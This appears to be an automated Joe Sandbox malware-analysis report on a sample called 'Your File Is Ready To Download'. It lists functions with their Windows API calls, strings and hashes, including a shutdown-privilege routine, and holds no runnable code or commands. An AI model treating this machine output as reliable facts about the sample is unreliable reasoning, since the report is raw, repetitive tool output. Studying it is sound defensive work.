Out of memory., xrefs: 0000000140029276, 0000000140029E95, 0000000140029F41
Ambiguous or invalid use of ".", xrefs: 0000000140029230, 0000000140029246
<>=/|^,:*&~!()[]{}+-?., xrefs: 0000000140028928, 000000014002894A, 0000000140028968, 0000000140028FE0
Unexpected %, xrefs: 00000001400291E2
=, xrefs: 0000000140028752
<>=/|^,:*&~!()[]{}", xrefs: 00000001400283A4
The leftmost character above is illegal in an expression., xrefs: 000000014002921A
Quote marks are required around this key., xrefs: 0000000140028817
Too many var/func refs., xrefs: 000000014002925C
<>=/|^,:*&~!()[]{}+-?, xrefs: 0000000140028685, 00000001400286EE, 0000000140028718
A label must not point to an ELSE or UNTIL or CATCH., xrefs: 0000000140029F32
'\;`, xrefs: 00000001400289F0

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: <>=/|^,:*&~!()[]{}"$ <>=/|^,:*&~!()[]{}+-?$ <>=/|^,:*&~!()[]{}+-?.$ =$'\;`$A label must not point to an ELSE or UNTIL or CATCH.$Ambiguous or invalid use of "."$Missing close-quote$Not allowed as an output variable.$Out of memory.$Parse$Quote marks are required around this key.$The leftmost character above is illegal in an expression.$Too many var/func refs.$Unexpected %$_$#@
API String ID: 0-249051751
Opcode ID: 7f2bdcd844f6c38ed78b9e1ba22d3d82c2b0c9c922dd05cfe40de48d5db92c31
Instruction ID: 2c3aff9e8129ae609a47a21db0db0698c57d35ec6241a12b15ce70f8e8505484
Opcode Fuzzy Hash: 7f2bdcd844f6c38ed78b9e1ba22d3d82c2b0c9c922dd05cfe40de48d5db92c31
Instruction Fuzzy Hash: A9C2CF7A60669181FBB69B17A1443FA62A5F75CBD4F84801AFF89476F5EB38CC91C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140068FF0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000000014006902F
GetForegroundWindow.USER32 ref: 0000000140069043

Strings

H, xrefs: 000000014006909B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountForegroundTickWindow
String ID: H
API String ID: 1022652907-2852464175
Opcode ID: 1077d7dc5c41d1f738413a246805a62d7fa19dd16703351713b7a7d63bc786b8
Instruction ID: bf32ce5787aa54775d81e5c24cda452f843a838051dfb3e04e3eafc4b4008841
Opcode Fuzzy Hash: 1077d7dc5c41d1f738413a246805a62d7fa19dd16703351713b7a7d63bc786b8
Instruction Fuzzy Hash: 7551B0722057808AFB66DF27E8043EA73A6FB8DB90F244515EB5947AB8DF78C445CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014009E010, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 183windowlibraryloaderCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,?,?,?,?,000000014007577E), ref: 000000014009E07C
SendMessageW.USER32 ref: 000000014009E12E
SendMessageW.USER32 ref: 000000014009E186
LoadLibraryW.KERNEL32 ref: 000000014009E1D6
GetProcAddress.KERNEL32 ref: 000000014009E1EB
SendMessageW.USER32 ref: 000000014009E260
SendMessageW.USER32 ref: 000000014009E294
SendMessageW.USER32 ref: 000000014009E2DD

Strings

StrCmpLogicalW, xrefs: 000000014009E1E1
shlwapi, xrefs: 000000014009E1CF

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessageSend$AddressLibraryLoadProc
String ID: StrCmpLogicalW$shlwapi
API String ID: 1746250041-63816878
Opcode ID: d74a595051f439f92c47264d445b6b58406bb6a98fbc71c82d3528321b9a99a8
Instruction ID: 85b5f7485b164ab87523c831e5341ee24094b5cacda06afb25474c354cf37385
Opcode Fuzzy Hash: d74a595051f439f92c47264d445b6b58406bb6a98fbc71c82d3528321b9a99a8
Instruction Fuzzy Hash: 0F819F726086D08AF762CF66E4447DF7BA5F788784F548116FB8947AA5CB7CC885CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140099048, Relevance: 16.7, APIs: 11, Instructions: 224windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 0000000140099050
SendMessageW.USER32 ref: 000000014009906F
malloc.LIBCMT ref: 0000000140099086

Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8

SendMessageW.USER32 ref: 00000001400990A6
_itow.LIBCMT ref: 0000000140099100
_itow.LIBCMT ref: 00000001400991E4

Part of subcall function 00000001400C9A10: HeapFree.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A26
Part of subcall function 00000001400C9A10: _errno.LIBCMT ref: 00000001400C9A30
Part of subcall function 00000001400C9A10: GetLastError.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A38

SendMessageW.USER32 ref: 0000000140099280

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessageSend_errno$Heap_itow$AllocateErrorFreeLastLongWindow_callnewhmalloc
String ID:
API String ID: 4170425513-0
Opcode ID: 9516f0d2888f96d3ff25729819a014950d18490cd65d6f40258261218e071b71
Instruction ID: 16c26584fa8b2cdca4358e5b801beed3da81f9d8a5ccb165caa221a540f42e5e
Opcode Fuzzy Hash: 9516f0d2888f96d3ff25729819a014950d18490cd65d6f40258261218e071b71
Instruction Fuzzy Hash: A291D23170569081FB669B6B95093EE26A0FB8DBE4F184625FF6A477F6DE38C4428300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140073050, Relevance: 16.3, APIs: 6, Strings: 3, Instructions: 571COMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 00000001400730BD

Strings

Out of memory., xrefs: 0000000140073629
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014007332C
<<>>, xrefs: 00000001400737FD

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: wcsncpy
String ID: <<>>$Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 322933527-651194365
Opcode ID: 4024a9fd613815c53746b05d66fef0de2f21e117dfa886bf802c06163e5a0baf
Instruction ID: 54342170228fe29567b6ab5d29182fb3be9c6e401a94da33a8bd56284c8f3106
Opcode Fuzzy Hash: 4024a9fd613815c53746b05d66fef0de2f21e117dfa886bf802c06163e5a0baf
Instruction Fuzzy Hash: DF42CDB2604B8185FB6ACB27D4547E967A1F78CBD4F944126FB9A07BB5DB38C885C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005B0B0, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 600COMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 000000014005B0E5
_ui64tow.LIBCMT ref: 000000014005B4FC
_ui64tow.LIBCMT ref: 000000014005B720
malloc.LIBCMT ref: 000000014005B8C4

Strings

Out of memory., xrefs: 000000014005B4C8, 000000014005B907
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014005B275, 000000014005B82B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _ui64tow$mallocwcsncpy
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 1683598202-457448710
Opcode ID: e178f51bce3ac928f138508a6f98b498b05e79369044f55f16dcffa2b7b6b023
Instruction ID: 50dd1928b92c838915ddc26878011102f6f0bc6d5424618c5d31d1c2ae3cbf05
Opcode Fuzzy Hash: e178f51bce3ac928f138508a6f98b498b05e79369044f55f16dcffa2b7b6b023
Instruction Fuzzy Hash: 4842CF32205A94C2EB66CB27E0147EA67A1FB8CBC4F544112FB9A47BF5EB3AD541C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400810B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00000001400810B8
OpenProcessToken.ADVAPI32 ref: 00000001400810CB
LookupPrivilegeValueW.ADVAPI32 ref: 00000001400810EB
AdjustTokenPrivileges.ADVAPI32 ref: 000000014008111C
GetLastError.KERNEL32 ref: 0000000140081122
ExitWindowsEx.USER32 ref: 0000000140081130

Strings

SeShutdownPrivilege, xrefs: 00000001400810E2

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: ec9fb9d12d4dc4484accdbc553e33bd593cee51f5a49c5a3406da35a095f8b5e
Instruction ID: f6aaa6cbccc93770738cf3e7b4ace6a3acd7a503507d81cfcc2f547cd21d43a3
Opcode Fuzzy Hash: ec9fb9d12d4dc4484accdbc553e33bd593cee51f5a49c5a3406da35a095f8b5e
Instruction Fuzzy Hash: A6017171615B8182E7519B62B8483DE63E0FFCC795F408029B74A87674DF7CC59ACB10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140067130, Relevance: 9.1, APIs: 6, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000014006719B
GetFileSizeEx.KERNEL32 ref: 00000001400671B5
CloseHandle.KERNEL32 ref: 00000001400671C0
FindFirstFileW.KERNEL32 ref: 00000001400671D2
GetLastError.KERNEL32 ref: 00000001400671DE
FindClose.KERNEL32 ref: 0000000140067216

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: File$CloseFind$CreateErrorFirstHandleLastSize
String ID:
API String ID: 2200430037-0
Opcode ID: 66f869ec7801c908e77214fa29eabad2038bc89d49a1086379cbf0956a0641a7
Instruction ID: 30045df24ddf6c7d75368c9e012335c1e2eb4daeb347df2d5b9a6ad5a0ff1140
Opcode Fuzzy Hash: 66f869ec7801c908e77214fa29eabad2038bc89d49a1086379cbf0956a0641a7
Instruction Fuzzy Hash: 4F41BE3160478186FB629B27E8547EA63A6BB8DBE4F144620FF6D07BE5DB3CC4458710

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005F000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 000000014005F07E
SetVolumeLabelW.KERNEL32 ref: 000000014005F0E0

Part of subcall function 000000014005E940: wcsncpy.LIBCMT ref: 000000014005E984
Part of subcall function 000000014005E940: GetDiskFreeSpaceExW.KERNEL32 ref: 000000014005E9E5

Strings

Out of memory., xrefs: 000000014005F3CD
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014005F19C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: wcsncpy$DiskFreeLabelSpaceVolume
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 1259151110-457448710
Opcode ID: c8240890632d4640e21d9544eb1d4cfc45cf5f7cd1f2786e236af0401669bbda
Instruction ID: 65954922904b7675b33169d31ade53baa2856b151111e240089bb3e8fcc5fcc8
Opcode Fuzzy Hash: c8240890632d4640e21d9544eb1d4cfc45cf5f7cd1f2786e236af0401669bbda
Instruction Fuzzy Hash: 37C1DD72604A4085FB22DB26D4003FA6362F74DBE8F544212EB6E577E9DA7EC985E340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140050135, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 0000000140050180

Part of subcall function 00000001400B12D0: GetForegroundWindow.USER32(?,000000014000C660), ref: 00000001400B1324
Part of subcall function 00000001400B12D0: IsWindowVisible.USER32 ref: 00000001400B133E

malloc.LIBCMT ref: 0000000140050376

Strings

Out of memory., xrefs: 0000000140050767
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140050548
0x%08X, xrefs: 0000000140050186

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ForegroundLongVisiblemalloc
String ID: 0x%08X$Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 3124468314-2084117749
Opcode ID: 0104b18eeb464d3f132f21a786c85cc0616c5f53f72c3cf15b62a0491825cdc1
Instruction ID: 8674c50f6ee5735242b3a5119cb04b93a2874a0cf7386be8362db15dcc10f3c3
Opcode Fuzzy Hash: 0104b18eeb464d3f132f21a786c85cc0616c5f53f72c3cf15b62a0491825cdc1
Instruction Fuzzy Hash: 5891E332A08A4482EB27DF26D0043ED63A2A74CBD8F544612FB5E177F9DB79C942D344

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007C03F, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 233windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 000000014007C066

Strings

Out of memory., xrefs: 000000014007C32C
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014007C116

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessageSendTimeout
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 1599653421-457448710
Opcode ID: 9d8b547c95bdde4c25c4efb147c8e06d290d7d48f6f9f752d6d528f40707f4e3
Instruction ID: 5c4f0a8397971feea1a408e8c131fd75622cb045fc0b10784931d4204c731187
Opcode Fuzzy Hash: 9d8b547c95bdde4c25c4efb147c8e06d290d7d48f6f9f752d6d528f40707f4e3
Instruction Fuzzy Hash: DFA10332210B8081FB639B26D404BEA6361F75DBE8F544216EF5A17BEACB3CC446D340

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008F01D, Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 722COMMON

Download Yara Rule

Strings

Button%s, xrefs: 000000014008F12A

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Button%s
API String ID: 0-752360883
Opcode ID: a390547361d97f42dd62dc3e5404cc432f3537a714abf9079b9ce90132f9ae46
Instruction ID: bf8c648d8d43d0f56908223e8cf259bd8188cb9a65312f9997871af1ccff45d8
Opcode Fuzzy Hash: a390547361d97f42dd62dc3e5404cc432f3537a714abf9079b9ce90132f9ae46
Instruction Fuzzy Hash: 7252BC33301B8486EB26CA3695443FA67A1F748BE4F944315EF6947BE9EB78C641D340

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008F05E, Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 722COMMON

Download Yara Rule

Strings

Button%s, xrefs: 000000014008F12A

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Button%s
API String ID: 0-752360883
Opcode ID: 13bb319c07fe60c680617079371a11e911f338606c7e4116d9400195ae6ce679
Instruction ID: 58ebd7b5569ae0fa898e350418e2491ccf96151b302b515c3397dfb32da76a9c
Opcode Fuzzy Hash: 13bb319c07fe60c680617079371a11e911f338606c7e4116d9400195ae6ce679
Instruction Fuzzy Hash: 6B62BD33300B8486EB26CA3695483FA67A1F7487E4F944315EF6947BE9EB78C640D740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008EFF7, Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 711COMMON

Download Yara Rule

Strings

Button%s, xrefs: 000000014008F12A

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Button%s
API String ID: 0-752360883
Opcode ID: b933b6509b4f0dfba5355d6a6fb93c2e579a846ca2f49161f436f1f0c8921317
Instruction ID: 90ab8ab9cebaa2a7ca95c3e20255f2db65f68c13f1189f25bc4b80ba08595454
Opcode Fuzzy Hash: b933b6509b4f0dfba5355d6a6fb93c2e579a846ca2f49161f436f1f0c8921317
Instruction Fuzzy Hash: A852AB33301B8486EB268A3695443FA67A1F748BE4FA40315EF6947BE9EB78C640D740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008EFEB, Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 704COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 000000014008FEA5

Strings

Button%s, xrefs: 000000014008F12A

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Button%s
API String ID: 0-752360883
Opcode ID: 0c3cb58ee1ec77ad07fd51da2c185be298b2e0feb5456eebfe4966cfc4fd176d
Instruction ID: 38dd844d79ec5db08fdae1e13e6426a0dd20f18caa47a6cd8c4dfe0405aa6976
Opcode Fuzzy Hash: 0c3cb58ee1ec77ad07fd51da2c185be298b2e0feb5456eebfe4966cfc4fd176d
Instruction Fuzzy Hash: EB52AC32300B8496EB26CB3695443FA67A1F748BE4FA40315EF6947BE9EB78C641D740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D8074, Relevance: 5.8, Strings: 4, Instructions: 796COMMONLIBRARYCODE

Download Yara Rule

Strings

1#QNAN, xrefs: 00000001400D8211
1#INF, xrefs: 00000001400D81DA
1#IND, xrefs: 00000001400D81A3
1#SNAN, xrefs: 00000001400D815E

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: e53e507b9e4632d28240df657cb3975822b76def0f2b1a9e78472029ff44d66a
Instruction ID: f722a68e346a0a00167013cbe5131c505941543e934024ae535bce9b286aee10
Opcode Fuzzy Hash: e53e507b9e4632d28240df657cb3975822b76def0f2b1a9e78472029ff44d66a
Instruction Fuzzy Hash: F062D277B246518BF736CF76C000BED37B2BB58788F849019EF0567A98EA348916C764

Uniqueness

Uniqueness Score: -1.00%
